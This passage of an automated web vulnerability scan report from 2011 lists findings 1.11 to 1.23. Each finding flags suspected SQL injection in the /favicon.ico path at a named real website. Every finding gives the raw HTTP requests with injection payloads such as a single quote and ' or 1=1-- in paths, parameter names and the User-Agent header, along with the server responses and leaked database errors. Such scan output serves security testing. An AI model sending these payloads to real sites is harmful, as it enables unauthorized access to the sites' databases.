<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<titl
...[SNIP]...

1.11. http://www.divorcemag.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.divorcemag.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /favicon.ico?1'=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.divorcemag.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:21:52 GMT
Server: Apache/1.3.39 (Unix) mod_ssl/2.8.30 OpenSSL/0.9.7e-p1
Set-Cookie: PSESS=eb5be03b0b19be852962b628233873e2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 60

Query to the database server failed, sorry. Try again later.

Request 2

GET /favicon.ico?1''=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.divorcemag.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 11:21:52 GMT
Server: Apache/1.3.39 (Unix) mod_ssl/2.8.30 OpenSSL/0.9.7e-p1
Set-Cookie: PSESS=9f178e93370297b3301f3e79fb144831; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 488

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<titl
...[SNIP]...

1.12. http://www.edison.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.edison.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /favicon.ico' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.edison.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/5.0
Date: Tue, 03 May 2011 10:26:11 GMT
Content-Length: 760
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCSTBBRAT=PGCIEEICALMNEGGIBIDNCKFA; path=/
Cache-control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<HTML dir=ltr>
<HEAD>
<style>
a:link            {font:8pt/11pt verdana; color:FF0000}
a:visited        {font:8pt/11pt verdana; color:#4e4e4e}
</style>
...[SNIP]...
<font face="Arial" size=2>[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string 'favicon.ico''.</font>
...[SNIP]...

1.13. http://www.expertsatellite.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.expertsatellite.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 12342703%20or%201%3d1--%20 and 12342703%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /favicon.ico?112342703%20or%201%3d1--%20=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.expertsatellite.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 403 Forbidden
Date: Tue, 03 May 2011 11:05:24 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
ETag: "13e-48bf77beaa1c0"
Last-Modified: Thu, 22 Jul 2010 10:35:59 GMT
Content-Type: text/plain; charset=UTF-8
Content-Length: 318

..............(.......(....... ................................Y........K.....................................................................................................................""""""""""""""""!...."."!.""!.."!...".""!.""!.."!...."."""""""""................................................................

Request 2

GET /favicon.ico?112342703%20or%201%3d2--%20=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.expertsatellite.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:05:24 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
ETag: "13e-48bf77af67dc0"
Last-Modified: Thu, 22 Jul 2010 10:35:43 GMT
Content-Type: text/plain; charset=UTF-8
Content-Length: 318

..............(.......(....... ................................Y........K.....................................................................................................................""""""""""""""""!...."."!.""!.."!...".""!.""!.."!...."."""""""""................................................................

1.14. http://www.infiniti.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.infiniti.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 15382271'%20or%201%3d1--%20 and 15382271'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /favicon.ico15382271'%20or%201%3d1--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.infiniti.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 500 Internal Server Error
Server: AkamaiGHost
Mime-Version: 1.0
Content-Type: text/html
Content-Length: 284
Expires: Tue, 03 May 2011 11:25:09 GMT
Date: Tue, 03 May 2011 11:25:09 GMT
Connection: close

<HTML><HEAD>
<TITLE>Internal Server Error</TITLE>
</HEAD><BODY>
<H1>Internal Server Error - Read</H1>
The server encountered an internal error or misconfiguration and was unable to
complete your request.<P>
Reference&#32;&#35;3&#46;66ce8f18&#46;1304421909&#46;372a7dbb
</BODY></HTML>

Request 2

GET /favicon.ico15382271'%20or%201%3d2--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.infiniti.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.0.63 (Win32) Communique/4.0.1 mod_jk/1.2.28
Content-Length: 1443
Content-Type: text/html;charset=UTF-8
Date: Tue, 03 May 2011 11:25:09 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <meta http-equiv="expires" content="never">
   <meta http-equiv="CACHE-CONTROL" content="PUBLIC">
   <meta name="Copyright" content="Infiniti Global">
   <meta name="Designer" content="Infiniti Global">
   <meta name="Publisher" content="Infiniti Global">
   <meta name="Revisit-After" content="15 days">
   <meta name="distribution" content="Local">
   <meta name="Robots" content="INDEX,FOLLOW">
   <meta name="MSSmartTagsPreventParsing" content="TRUE">
   <meta name="author" content="Infiniti Global">
   
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
   <title>Not Found</title>
   
   <script type="text/javascript" src="/static/scripts/s_code.js"></script>
   
   <link rel="stylesheet" type="text/css" href="/static/media/styles/reset.css">
   <link rel="stylesheet" type="text/css" href="/static/media/styles/site.css">
</head>
   <body class="noscript">
       <div id="flashcontent">
           <h1 id="header-logo">Infiniti</h1>
           <div id="wrapper">
               <h1>Not found</h1>
               <p>The page you have requested was not found.</p>
               <p>You may have clicked an expired link or mistyped the address.</p>
           </div>
       </div>
       <script type="text/script">
           s.pageType = 'errorPage';
           var s_code=s.t();
           if(s_code) document.write(s_code);
       </script>
   </body>
</html>

1.15. http://www.infiniti.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.infiniti.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 19896265%20or%201%3d1--%20 and 19896265%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /favicon.ico?119896265%20or%201%3d1--%20=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.infiniti.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 500 Internal Server Error
Server: AkamaiGHost
Mime-Version: 1.0
Content-Type: text/html
Content-Length: 284
Expires: Tue, 03 May 2011 11:25:03 GMT
Date: Tue, 03 May 2011 11:25:03 GMT
Connection: close

<HTML><HEAD>
<TITLE>Internal Server Error</TITLE>
</HEAD><BODY>
<H1>Internal Server Error - Read</H1>
The server encountered an internal error or misconfiguration and was unable to
complete your request.<P>
Reference&#32;&#35;3&#46;66ce8f18&#46;1304421903&#46;372a797f
</BODY></HTML>

Request 2

GET /favicon.ico?119896265%20or%201%3d2--%20=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.infiniti.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Win32) Communique/4.0.1 mod_jk/1.2.28
Last-Modified: Thu, 30 Jul 2009 21:49:47 GMT
ETag: "3cea-57e-484a594f"
Accept-Ranges: bytes
Content-Length: 1406
Content-Type: image/x-icon
Date: Tue, 03 May 2011 11:25:04 GMT
Connection: close

..............h.......(....... ...........@...................................RQQ.311.........gff.........wvv......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
...................    .....    .....    ..    .............................
....
....
................





.....................................................................................................................................

1.16. http://www.lvhn.org/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lvhn.org
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /favicon.ico' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.lvhn.org
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:37:14 GMT
Server: LiteSpeed
Connection: close
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=9c1a7a3fa55a51b4b0a14529df464a4b; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 209
Vary: User-Agent

invalid query:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/favicon.ico'' and a.template_id = b.template_id' at line 1

Request 2

GET /favicon.ico'' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.lvhn.org
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:37:14 GMT
Server: LiteSpeed
Connection: close
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=eeb38462e2017f6127c166bb113704f4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Vary: User-Agent
Content-Length: 37376

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="X-UA-Comp
...[SNIP]...

1.17. http://www.mailfromftd.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.mailfromftd.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 21410475'%20or%201%3d1--%20 and 21410475'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /favicon.ico21410475'%20or%201%3d1--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mailfromftd.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 503 Service Unavailable
Server: Varnish
Retry-After: 0
Content-Type: text/html; charset=utf-8
Content-Length: 418
Date: Tue, 03 May 2011 11:28:52 GMT
X-Varnish: 437988272
Age: 13
Via: 1.1 varnish
Connection: close


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>503 Service Unavailable</title>
</head>
<body>
<h1>Error 503 Service Unavailable</h1>
<p>Service Unavailable</p>
<h3>Guru Meditation:</h3>
<p>XID: 437988272</p>
<hr>
<p>Varnish cache server</p>
</body>
</html>

Request 2

GET /favicon.ico21410475'%20or%201%3d2--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mailfromftd.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 301 Moved Permanently
Server: Apache
Set-Cookie: TLTSID=8619F46E75781075002383DB220F9615; Path=/; Domain=.mailfromftd.com
Set-Cookie: TLTUID=8619F46E75781075002383DB220F9615; Path=/; Domain=.mailfromftd.com; expires=Tue, 03-05-2021 11:28:52 GMT
Location: http://www.ftd.com/error.epl
Content-Type: text/html; charset=iso-8859-1
Content-Length: 347
Date: Tue, 03 May 2011 11:28:52 GMT
X-Varnish: 628702974
Age: 0
Via: 1.1 varnish
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>301 Moved Permanently</TITLE>
</HEAD><BODY>
<H1>Moved Permanently</H1>
The document has moved <A HREF="http://www.ftd.com/error.epl">here</A>.<P>
<P>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.
</BODY></HTML>

1.18. http://www.nativeoutdoors.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.nativeoutdoors.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 96460785'%20or%201%3d1--%20 and 96460785'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /favicon.ico96460785'%20or%201%3d1--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.nativeoutdoors.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 403 Forbidden
Date: Tue, 03 May 2011 10:18:37 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 537
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /favicon.ico96460785' or 1=1--
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.nativeoutdoors.com Port 80</address>
</body></html>

Request 2

GET /favicon.ico96460785'%20or%201%3d2--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.nativeoutdoors.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:18:38 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 3656

<html>

<head>
<meta http-equiv="Content-Language" content="en-us">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Native Outdoors Page Not Found</title>
<meta name="Microsoft Border" content="t, default">
</head>

<body><!--msnavigation--><table border="0" cellpadding="0" cellspacing="0" width="100%"><tr><td>

<p align="center"><map name="FPMap0_I1">
<area href="http://www.nativeoutdoors.com/php/giveaway.php" shape="rect" coords="385, 2, 541, 27">
<area href="http://www.nativeoutdoors.com/contact.html" shape="rect" coords="546, 1, 680, 29">
<area href="http://order.store.yahoo.net/cgi-bin/wg-order?nativeoutdoors" shape="rect" coords="694, 0, 799, 30">
<area href="http://www.nativeoutdoors.com/index.html" shape="rect" coords="9, 0, 279, 117">
<area href="http://www.nativeoutdoors.com/index.html" shape="rect" coords="315, 2, 376, 26">
</map><img border="0" src="images/index/main/header.jpg" usemap="#FPMap0_I1" align="left" hspace="1" width="800" height="125"></p>

</td></tr><!--msnavigation--></table><!--msnavigation--><table dir="ltr" border="0" cellpadding="0" cellspacing="0" width="100%"><tr><!--msnavigation--><td valign="top">

<p align="center"><map name="FPMap0_I1">
<area href="http://www.nativeoutdoors.com/scoutingcameras.html" shape="rect" coords="0, 119, 100, 149">
<area href="http://www.nativeoutdoors.com/deerfeeders.html" shape="rect" coords="99, 119, 213, 149">
<area href="http://www.nativeoutdoors.com/aerialassault.html" shape="rect" coords="214, 120, 317, 149">
<area href="http://www.nativeoutdoors.com/archery/index.html" shape="rect" coords="316, 120, 402, 149">
<area href="http://www.nativeoutdoors.com/guncases.html" shape="rect" coords="402, 119, 488, 149">

...[SNIP]...

1.19. http://www.nativeoutdoors.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.nativeoutdoors.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 16573550%20or%201%3d1--%20 and 16573550%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /favicon.ico?116573550%20or%201%3d1--%20=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.nativeoutdoors.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 403 Forbidden
Date: Tue, 03 May 2011 10:18:13 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 518
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /favicon.ico
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.nativeoutdoors.com Port 80</address>
</body></html>

Request 2

GET /favicon.ico?116573550%20or%201%3d2--%20=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.nativeoutdoors.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:18:13 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Tue, 09 Feb 2010 21:19:07 GMT
ETag: "1e6a094-cbe-47f3177cea8c0"
Accept-Ranges: bytes
Content-Length: 3262
Content-Type: image/x-icon

...... ..............(... ...@...............#...#..............................................................................................................................................................................................................=?>." [][...[][." =?>.................................." ......[][." .1/........................[][." ." .1/." ." =?>[][...yzy.....................=?>." ." .1/." ." .1/[][...yzy......................" ." ." .1/.................................." ." ." ." ." ." ....................................." ." yzy..............................=?>." ." ." ." ." LNM...jlj..............................." ." [][..............................." ." ." ." ." ." =?>...jlj..............................." ." =?>...jlj......................1/." ." ." ." ." ." ." ...[][..............................LNM." ." ...[][......................" ." ." ." ." ." ." ." ....................................jlj." ." .........................1/." ." ." ." ." ." ." ." ........................................" ." ........................." ." ." ." ." ." ." ." ." ........................................" ." ......................1/." ." ." ." ." ." ." ." ." [][...[][..............................." ." [][...jlj.........yzy." ." ." ." ." ." ." .1/." ." .1/...jlj..............................." ." .1/...jlj.........." ." ." ." ." ." ." ." ...[][." ." ....................................." ." ." ...[][......yzy." ." ." ." ." ." ." .1/......." ." [][...jlj............................" ." ." ............." ." ." ." ." ." ." ." .........." ." ." ..................................1/." ." .........[][." ." ." ." ." ." ." =?>.........."
...[SNIP]...

1.20. http://www.needlepointers.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.needlepointers.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /favicon.ico' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.needlepointers.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Tue, 03 May 2011 10:19:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 354
Content-Type: text/html
Set-Cookie: ASPSESSIONIDAADSDDTD=FJIJEFODIEFFIKFFFFMCFJCF; path=/
Cache-control: private

<font face="Arial" size=2>
<p>Microsoft OLE DB Provider for ODBC Drivers</font> <font face="Arial" size=2>error '80004005'</font>
<p>
<font face="Arial" size=2>[Microsoft][ODBC Driver Manager] Data s
...[SNIP]...

1.21. http://www.osbornewood.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.osbornewood.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /favicon.ico' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.osbornewood.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:50:51 GMT
Server: Apache/2.2.16 (EL)
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=e29d3bebf89e00eb1536ce53fb29ce04; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 151
Connection: close
Content-Type: text/html; charset=UTF-8

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '.cfm'' at line 1

1.22. http://www.payentry.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.payentry.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /favicon.ico' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.payentry.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:37:44 GMT
Connection: close

<html>
<head>
<title>Error</title>
</head>
<body>
<h1>Error</h1>
<p>The following error has occured while processing this request:</p>
<pre style="background-color: #e0e0e0;">Can't read list of app servers: Incorrect syntax near 'web'.
Unclosed quotation mark after the character string ''.
Statement(s) could not be prepared.
</pre>
...[SNIP]...

Request 2

GET /favicon.ico'' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.payentry.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 302 Object Moved
Content-Length: 161
Content-Type: text/html
Location: http://www5.payentry.com/favicon.ico''
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:37:44 GMT

<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="http://www5.payentry.com/favicon.ico''">here</a></body>

1.23. http://www.state.de.us/favicon.ico [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.state.de.us
Path:   /favicon.ico

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. The payloads 42840175'%20or%201%3d1--%20 and 42840175'%20or%201%3d2--%20 were each submitted in the User-Agent HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.342840175'%20or%201%3d1--%20
Host: www.state.de.us
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 403 Forbidden
Date: Tue, 03 May 2011 10:25:02 GMT
Server: Apache/2.2.3 (Oracle)
Content-Length: 293
Connection: close
Content-Type: text/html; charset=iso-8859-1

